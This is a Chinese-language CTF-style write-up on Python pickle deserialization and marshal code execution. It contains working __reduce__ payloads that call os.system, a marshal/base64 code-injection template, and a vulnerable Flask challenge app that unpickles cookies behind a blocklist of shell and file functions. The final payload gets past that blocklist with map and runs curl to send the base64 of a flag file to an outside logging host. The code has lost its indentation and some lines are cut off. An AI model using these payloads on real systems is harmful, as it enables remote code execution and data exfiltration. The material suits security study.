python pickle命令执行与marshal 任意代码执行

1.python pickle反序列化漏洞



import pickle
import os
class gen(object):
def __reduce__(self):
s = """dir"""
return os.system, (s,)

p = gen()
payload = pickle.dumps(p)
with open('payload.pkl', 'wb') as f:




import pickle
some code
''' pickle.load(open('./payload.pkl'))
some code

假设以上这段代码是服务器端处理反序列数据的时候的操作,其中没有将要调用的对象函数进行过滤,而是直接进行解序列化,导致代码执行 os.system("dir") 。


import marshal
import base64

def foo():
pass # Your code here

print """ctypes
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))


code_str = base64.b64decode(code_enc)
code = marshal.loads(code_str)
func = types.FunctionType(code, globals(), '')


from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string

import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile

SECRET_KEY = 'you will never guess'

if not os.path.exists('.secret'):
with open(".secret", "w") as f:
secret = ''.join(random.choice(string.ascii_letters + string.digits)
for x in range(4))
with open(".secret", "r") as f:
cookie_secret = f.read().strip()

app = Flask(__name__)

black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]

def count():
session['cnt'] = 0

def home():
remembered_str = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('index.html', txt=remembered_str, location=location)

def clear():
print("Reminder cleared!")
response = redirect(url_for('home'))
response.set_cookie('location', max_age=0)
return response

@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
if request.method == 'POST':
location = request.form["reminder"]
if location == '':
print("Message cleared, tell us when you have found more brains.")
print("We will remember where you find your brains.")
location = b64e(pickle.dumps(location))
cookie = make_cookie(location, cookie_secret)
response = redirect(url_for('home'))
response.set_cookie('location', cookie)
print 'location'
return response
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('reminder.html')

class FilterException(Exception):
def __init__(self, value):
super(FilterException, self).__init__(
'The callable object {value} is not allowed'.format(value=str(value)))

class TimesException(Exception):
def __init__(self):
super(TimesException, self).__init__(
'Call func too many times!')

def _hook_call(func):
def wrapper(*args, **kwargs):
session['cnt'] += 1
print session['cnt']
print args[0].stack
for i in args[0].stack:
if i in black_type_list:
raise FilterException(args[0].stack[-2])
if session['cnt'] > 4:
raise TimesException()
return func(*args, **kwargs)
return wrapper

def loads(strs):
files = StringIO(strs)
unpkler = pickle.Unpickler(files)
print strs,files,unpkler
unpkler.dispatch[pickle.REDUCE] = _hook_call(
return unpkler.load()

def getlocation():
cookie = request.cookies.get('location')
if not cookie:
return ''
(digest, location) = cookie.split("!")
print (digest, location),calc_digest(location, cookie_secret)
if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
print("Hey! This is not a valid cookie! Leave me alone.")

return False
location = loads(b64d(location))
return location

def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location)

def calc_digest(location, secret):
return sha256("%s%s" % (location, secret)).hexdigest()

if __name__ == '__main__':

app.run(host="", port=5051)


class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
def __reduce__(self):
return map,(os.system,["curl h7x7ty.ceye.io/`cat /flag_is_here|base64`"])

aa = Test()
payload = b64e(pickle.dumps(aa))
